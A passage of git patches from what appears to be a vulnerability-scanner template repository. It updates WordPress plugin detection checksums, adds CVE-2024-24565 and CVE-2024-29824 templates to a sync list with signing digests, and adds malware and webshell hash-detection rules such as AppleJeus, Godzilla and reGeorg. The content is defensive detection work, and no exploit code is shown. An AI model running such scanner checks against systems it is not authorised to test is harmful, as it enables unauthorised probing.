-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:b990fff1f3337e512694df82458fcf4d4f50c85c -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:a895c306438d0b17381106ebe34b893c416c1487 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:cf97c59d6ca9bacd7326ff5758b4704037548e3d +http/technologies/wordpress/plugins/mailpoet.yaml:5d37d6ac3ee7abd298a234cd68a2e8a100c3dcf5 +http/technologies/wordpress/plugins/maintenance.yaml:4908d15a87dc42e3d707ca8b14c695acdc05451a +http/technologies/wordpress/plugins/mainwp-child.yaml:b6d3dee0b969ebb23151a15ae2396120e5749749 +http/technologies/wordpress/plugins/malcare-security.yaml:f1100e3114e1a1a700e56cf9605cf630a175a759 +http/technologies/wordpress/plugins/megamenu.yaml:87c58e3f38cb0dcc6d82fb27a78a14d2aed8de07 +http/technologies/wordpress/plugins/members.yaml:f72b70c40d8c328c3f8aeeb8680b33e7e7d6b6ae +http/technologies/wordpress/plugins/meta-box.yaml:3220c38d8bb113ff30710ef2e79177891642f3eb +http/technologies/wordpress/plugins/metform.yaml:86ffbe9900ed81585695ba690bcf24136bf24157 +http/technologies/wordpress/plugins/ml-slider.yaml:b2a7d6061500a9aede76471aae83dd4b2c8cda9f +http/technologies/wordpress/plugins/newsletter.yaml:0f96bbbb4a82b82e2b63e0f577dcd38f3bc51f53 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:4571816110bf851c4b4487088da4e310d3ed05c2 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:2c51edfc319a4008332d1b0d959370c0fbadcab2 +http/technologies/wordpress/plugins/ninja-forms.yaml:6d2235089dc95816aeec833b45d55f929064f205 +http/technologies/wordpress/plugins/ocean-extra.yaml:c3256dec71a6d1a560f968596eba99768799500b +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:8f3d4f81048dd61f2ae723f0b59dce4969a36bb5 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ee3801c6bb4a45e6adb51da33cca03d2f444d1ee +http/technologies/wordpress/plugins/optinmonster.yaml:47fc9af237594404ecc1fda1682b09e9c27a73a1 +http/technologies/wordpress/plugins/otter-blocks.yaml:a01173315d2c9aad06431308a5a886133b6ef716 +http/technologies/wordpress/plugins/password-protected.yaml:1bc99e31bb5d21338e9ee00ca18d3251fcdf6385 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b474a0e0dfe6e253d5edcb69cf9d48345e3b4566 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:ba9797f8208c7c3ed5cb45048764d8ecd0a62835 -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:e38723f1c4f2157384d64e2b2fac7080e66887cc +http/technologies/wordpress/plugins/pixelyoursite.yaml:8e9a84ae0e4579c0e5c1d74a8e81bd40db6f0422 +http/technologies/wordpress/plugins/polylang.yaml:aee3a58c952f2f9638ff374341fc255819c72d1f http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:0838742608b1265516017095ccd495332e6a5991 -http/technologies/wordpress/plugins/post-smtp.yaml:754dd57d96b6f4456c570c7034a2ddf3056539f4 -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:195ac372f24aa1feb8c48fba65a97149f05e137f -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/popup-maker.yaml:63ee9d1afc4f684cefe2e93383cc3f13282afd43 +http/technologies/wordpress/plugins/post-smtp.yaml:155c3f2eeb681985e995b996be580d2accdd65fa +http/technologies/wordpress/plugins/post-types-order.yaml:48e99e2a6fd50a8bce03d71f0364d80cfad7c029 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:0b05429ee5a639590d22925ce10e85df80307a51 +http/technologies/wordpress/plugins/pretty-link.yaml:7620d75d156d0da9be7790d4001ce4ea34a210ce +http/technologies/wordpress/plugins/really-simple-captcha.yaml:72a821b2e7f0877db55062bb401d7912688a3162 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:e6427cff38c071c332b846bf01bc50ac0deb07f7 +http/technologies/wordpress/plugins/redirection.yaml:9bb1311228712e0139d6501832e4956eb3894d07 +http/technologies/wordpress/plugins/redux-framework.yaml:fd11db1d52f36ef5b0795d96caa416244626e129 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:5fdc1267f04e406ffcd377a4ee8c01eb9a51cf9a http/technologies/wordpress/plugins/royal-elementor-addons.yaml:9f6476b40090f693001f2da81075d5b3e650c2e3 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d3871c6333178618d88df609d41ea9e626c1e312 -http/technologies/wordpress/plugins/sg-cachepress.yaml:557b4e350cd47eafc012c39dad25d48d6b397de0 -http/technologies/wordpress/plugins/sg-security.yaml:4d092558c2718bd98454bbec4adf942903cec393 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/safe-svg.yaml:2921928bca091dc23532d34c55d522b480a04f9a +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:68c7ac8eecc2d5d848bdc4cb842508b86d39e480 +http/technologies/wordpress/plugins/sg-cachepress.yaml:0f35a0e9b889a6336d077833b0c9e2ffc673a978 +http/technologies/wordpress/plugins/sg-security.yaml:8711830da83847c1cc1f1c1995173144b8b5d6d0 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:6172f73bf27740719c1ebc72545220b9bb543608 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:1f45f93275673ff1ed0b3a841a0b8a9fa3b3fe5c +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:6fd499a700ec9234afa211206a93a07388ae090a http/technologies/wordpress/plugins/simple-history.yaml:8441cfcd6437b914c70f78136d76cdeb85e261a0 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f3961e9e08694816f33e638acf1af19b4262a840 +http/technologies/wordpress/plugins/siteguard.yaml:8407fe83a2757e6f48db7fa58752bdb239513c80 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:9491cca61448ddc0931b9e492d4d0620a7a21f67 +http/technologies/wordpress/plugins/smart-slider-3.yaml:e154bdfae754b085c715850f6cda0816d696862e +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:c51a0e1bf7cc99dc0a6f8a9357ca4bf9d59113d5 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9edb30d645fe661041ea30371023297ba0f84558 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/templately.yaml:c38b29f2acd823339a5f6e47b6da7d81815bf75b -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:a1116cd9a2c76a5764e177cfc1d75526568adef6 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:053ebf93fa012031b3e3988c8150de94dd210483 +http/technologies/wordpress/plugins/svg-support.yaml:49e21c813ae607ff35fe707f64ebc67e7f327178 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:3f8e37eed37423d52a86e57a2141df2681ef01b8 +http/technologies/wordpress/plugins/tablepress.yaml:3acebea57f9e6de71f74b6d80c7829aa0fb7d5f6 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:da31b9ab7b949ab1375424a9df2b4ed2b9dfe130 +http/technologies/wordpress/plugins/templately.yaml:d7c59eaf040b0d024cd9b98104137e9cc1478bc9 +http/technologies/wordpress/plugins/the-events-calendar.yaml:88785a89dcd69e5d32782ea55f1b0e0a85ccfb1d http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:5fc184d6e1eb819dc98519af81c48502b499de9a -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:23e7d0e19e26520b91c0b1fcf6d1408fbf8bc8b4 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:2728bbf5d127842472490ec500c339189878df6a +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:8d84f9fe69c3ed5ef4d75f9ec2c5a70a6a870505 +http/technologies/wordpress/plugins/under-construction-page.yaml:abee15657603197eac7a606f0885a0a67bd9f5da http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:0869ebd3a5621b5613665f63be4e3bdb52d4f58e +http/technologies/wordpress/plugins/updraftplus.yaml:87b0adff906160c39a062518172eede9c138603d http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/user-role-editor.yaml:f5210c7f44d307cd61a252c775b7f8d8490656dd http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/w3-total-cache.yaml:be7c63e6636cac0b46191d20ec25589deab59b62 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:138559a38173ef70fafc355f1eb75c6429a1f273 +http/technologies/wordpress/plugins/webp-express.yaml:6e74e967d05828bb44f95df687b779e87a9409a7 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:2d6837eae58c7f181b465c72b79b97eb70b57e96 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:30f16ad1cb93bb00eaa193373ae297ce86e3a456 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:442776bc7b153409179514064fc0af9cab078b09 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:5c10a7d879a5f1f2f3af5a17bed9ea1a473733f9 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:2f315183fd3a4bf762543878055a1c5412b32640 http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:961b2182decfa0e47bddb3a9435229fb28c9c7d3 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3e379163d373241c2e7a2ad497824f95689ee220 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d08acfc75ea94ba54850ef27d2720c9a26bbb7cb +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:dec38ddac20e1a62782a05ffecc1e4b694a7dfc1 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:79997a96471d9c436e710cec07900dce8b9e427b +http/technologies/wordpress/plugins/woocommerce-services.yaml:17acbbed6b5154f5aae7a28a7c809fb0e48a2730 +http/technologies/wordpress/plugins/woocommerce.yaml:a2a714aed8ec2376bcee7b3ec1678d0f1272a8a2 +http/technologies/wordpress/plugins/wordfence.yaml:ea1b287a6acbce1e98bc2c83c1352fb7d6c37087 +http/technologies/wordpress/plugins/wordpress-importer.yaml:07c57e2081d467a57490ac71e31b4bbb1df80e84 +http/technologies/wordpress/plugins/wordpress-seo.yaml:d44ae5b1ee126097bb37a528436991813e0edb88 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:5e49fe0cc33e1186de691ecb2a3200205d01a211 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:145d49708d027968e845531a36739f52eeb1ff3d -http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:977dd38e8ed67dad650e1bb90aae4b7074ff3ce5 -http/technologies/wordpress/plugins/wp-statistics.yaml:d274d87bcb46e8464ef502d06f790cdb0bf920bd -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/worker.yaml:a824029d257c756741676abbb44b25edae254afa +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:a2e7bf3fb6ee96f6fae88e9c07edb9e30bb16707 +http/technologies/wordpress/plugins/wp-file-manager.yaml:e8b8e06288b4df1e0d589cfd113f9fc49035fb2a +http/technologies/wordpress/plugins/wp-google-maps.yaml:2e2841931788dd3029978fcd2424ba94a1351c88 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:a70b499897756947a0c5604830af10ebaa819992 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:8644a6d73664593769ce715cf0415854a036d17e +http/technologies/wordpress/plugins/wp-migrate-db.yaml:911f2bf405cb47571cbcd16f53c1d3415827b5b9 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:94c4c0f5fe57f20866696c85b5a15df8da9b8814 +http/technologies/wordpress/plugins/wp-optimize.yaml:b9eaa748b3d3c4dd229490eab2204142fa840f7d +http/technologies/wordpress/plugins/wp-pagenavi.yaml:5de3aeb44a09bf52ef4701073df2c7dfabeedc94 +http/technologies/wordpress/plugins/wp-reset.yaml:9df2cc6249ec11b8bdf9db6fab331618da3c8f48 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:cde42b5a67df5b6c2ac62abd20fa2067cef47eb6 +http/technologies/wordpress/plugins/wp-rollback.yaml:63211315dbbb5562c64d1ddbaaaa919f8092d271 +http/technologies/wordpress/plugins/wp-seopress.yaml:21a0dcd8bc914a5f34e7027d82b3c2a973ae8d55 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:4f055866f6f13fa4dc6a5bef06785ed7468f7d25 +http/technologies/wordpress/plugins/wp-smushit.yaml:c084c57d67714820b29c08c483930d7e576bb343 +http/technologies/wordpress/plugins/wp-statistics.yaml:2083a35b9fa31564ccfd5e5c9c20e136953bd09b +http/technologies/wordpress/plugins/wp-super-cache.yaml:3c28754cd4b570550b9fcc64ff21625833f50e3f http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:704d8625d0ce79d506fb219fe7c1dc2ddd020019 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:54ea6e84c5609eb53489da72896741391ec2bee5 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cdc05075471b390a7bc700e286e6087e6dd1d0a1 +http/technologies/wordpress/plugins/wps-hide-login.yaml:43c1d5946823013026eb69a797d8065f3c0b56fd +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:b5b2885059669daf8c747ced108090055364121e http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1812f2f3d67a04bce3c71dbe31a6a3ab616411d1 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8676,7 +8679,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fddd283704ff533a7e3b08c221f0008dd2b38e56 +templates-checksum.txt:b8d5d0f3596192ef98b77f142f2f6bccf41711fd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 39943c5461098030ea645e441e1e30ce64fcd395 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 19 Jun 2024 08:28:07 +0000 Subject: [PATCH 0408/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 90aeb175d5..adfa06c7da 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,9 +23,11 @@ on: - 'http/cves/2024/CVE-2024-1728.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/cves/2024/CVE-2024-24112.yaml' + - 'http/cves/2024/CVE-2024-24565.yaml' - 'http/cves/2024/CVE-2024-2621.yaml' - 'http/cves/2024/CVE-2024-27718.yaml' - 'http/cves/2024/CVE-2024-28995.yaml' + - 'http/cves/2024/CVE-2024-29824.yaml' - 'http/cves/2024/CVE-2024-31750.yaml' - 'http/cves/2024/CVE-2024-31982.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' From db1fbcc9ab8b029e846eebe5503ba1f30fe02654 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 19 Jun 2024 08:29:22 +0000 Subject: [PATCH 0409/1841] Auto Template Signing [Wed Jun 19 08:29:22 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24565.yaml | 1 + http/cves/2024/CVE-2024-29824.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-24565.yaml b/http/cves/2024/CVE-2024-24565.yaml index 8b778651ca..d007f6561b 100644 --- a/http/cves/2024/CVE-2024-24565.yaml +++ b/http/cves/2024/CVE-2024-24565.yaml @@ -56,3 +56,4 @@ http: - "contains_all(header, 'application/json')" - "status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200" condition: and +# digest: 4b0a00483046022100d8b2ec5081f12f4e249c8d56053734adb8094e605deee44cfa0f5b95400d0c53022100d7dea7c9abf3e11cfa4918875657aaa8a52942c0ca9c3bec58aec404ed905b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29824.yaml b/http/cves/2024/CVE-2024-29824.yaml index fc1842ad87..36ecbd187e 100644 --- a/http/cves/2024/CVE-2024-29824.yaml +++ b/http/cves/2024/CVE-2024-29824.yaml @@ -55,3 +55,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402200e7923b00ef9ead9d19fb59cc891e3b7ac1d6e0568ded82cb74735024bcf13bc022057ef188392633662d73cde6703d2ec9dffe733b7c63f613e303c7ec3ce0e204a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8ce29412803f4b307ffd19f4fa321834c7647ccb Mon Sep 17 00:00:00 2001 From: Vikas Gupta <vikasgupta.92155@gmail.com> Date: Wed, 19 Jun 2024 14:03:39 +0530 Subject: [PATCH 0410/1841] Update ec2-detection.yaml --- dns/ec2-detection.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml index cc95bc1353..c43aa37c25 100644 --- a/dns/ec2-detection.yaml +++ b/dns/ec2-detection.yaml @@ -6,7 +6,8 @@ info: severity: info description: Amazon Elastic Compute Cloud (EC2) detected. reference: - - https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state + - https://aws.amazon.com/ec2/ + - https://infosecwriteups.com/dangling-dns-aws-ec2-e2d801701e8 classification: cwe-id: CWE-200 metadata: From 93fb2c7ba4ad2ff8b37534b2fa0958a420bf64f1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 19 Jun 2024 15:43:35 +0530 Subject: [PATCH 0411/1841] update --- file/malware/hash/applejeus-malware.yaml | 23 ++++++++++++ file/malware/hash/avburner-malware.yaml | 18 ++++++++++ file/malware/hash/backwash-malware.yaml | 27 ++++++++++++++ file/malware/hash/bluelight-malware.yaml | 21 +++++++++++ .../malware/hash/charmingcypress-malware.yaml | 17 +++++++++ file/malware/hash/disgomoji-malware.yaml | 18 ++++++++++ file/malware/hash/evilbamboo-malware.yaml | 36 +++++++++++++++++++ file/malware/hash/flipflop-malware.yaml | 21 +++++++++++ file/malware/hash/gimmick-malware.yaml | 18 ++++++++++ file/malware/hash/godzilla-webshell.yaml | 19 ++++++++++ file/malware/hash/ico-malware.yaml | 26 ++++++++++++++ file/malware/hash/powerstar-malware.yaml | 22 ++++++++++++ file/malware/hash/regeorg-webshell.yaml | 19 ++++++++++ file/malware/hash/rokrat-malware.yaml | 22 ++++++++++++ file/malware/hash/sharpext-malware.yaml | 21 +++++++++++ 15 files changed, 328 insertions(+) create mode 100644 file/malware/hash/applejeus-malware.yaml create mode 100644 file/malware/hash/avburner-malware.yaml create mode 100644 file/malware/hash/backwash-malware.yaml create mode 100644 file/malware/hash/bluelight-malware.yaml create mode 100644 file/malware/hash/charmingcypress-malware.yaml create mode 100644 file/malware/hash/disgomoji-malware.yaml create mode 100644 file/malware/hash/evilbamboo-malware.yaml create mode 100644 file/malware/hash/flipflop-malware.yaml create mode 100644 file/malware/hash/gimmick-malware.yaml create mode 100644 file/malware/hash/godzilla-webshell.yaml create mode 100644 file/malware/hash/ico-malware.yaml create mode 100644 file/malware/hash/powerstar-malware.yaml create mode 100644 file/malware/hash/regeorg-webshell.yaml create mode 100644 file/malware/hash/rokrat-malware.yaml create mode 100644 file/malware/hash/sharpext-malware.yaml diff --git a/file/malware/hash/applejeus-malware.yaml b/file/malware/hash/applejeus-malware.yaml new file mode 100644 index 0000000000..28ea397f81 --- /dev/null +++ b/file/malware/hash/applejeus-malware.yaml @@ -0,0 +1,23 @@ +id: applejeus-malware +info: + name: AppleJeus Malware - Detect + author: pussycat0x + severity: info + description: Detects AppleJeus DLL samples + reference: + - https://github.com/volexity/threat-intel/blob/main/2022/2022-12-01%20Buyer%20Beware%20-%20Fake%20Cryptocurrency%20Applications%20Serving%20as%20Front%20for%20AppleJeus%20Malware/yara.yar + tags: malware,lazarus + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629'" + - "sha256(raw) == 